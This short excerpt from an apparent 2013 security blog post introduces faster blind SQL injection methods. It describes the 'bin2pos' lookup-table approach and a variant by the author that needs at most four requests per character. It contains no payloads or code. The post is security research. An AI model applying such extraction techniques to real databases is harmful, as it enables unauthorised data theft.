Showing posts with label Fast Blind SQL injection. Show all posts
Showing posts with label Fast Blind SQL injection. Show all posts

Saturday, 12 October 2013

Even Faster Blind SQL injection methods

A method presented at DerbyCon and BlackHat involves extracting not the bits of the character but the bits of a characters position in a look up table which contains a number of character ascii values---more on this later. This post discusses the conceptual advantages and fundamental drawbacks of the bin2pos method and introduces a new variant I've developed which provides better stability and only requires a maximum of 4 requests per character extraction but imposes some configurational requirements to the target web server.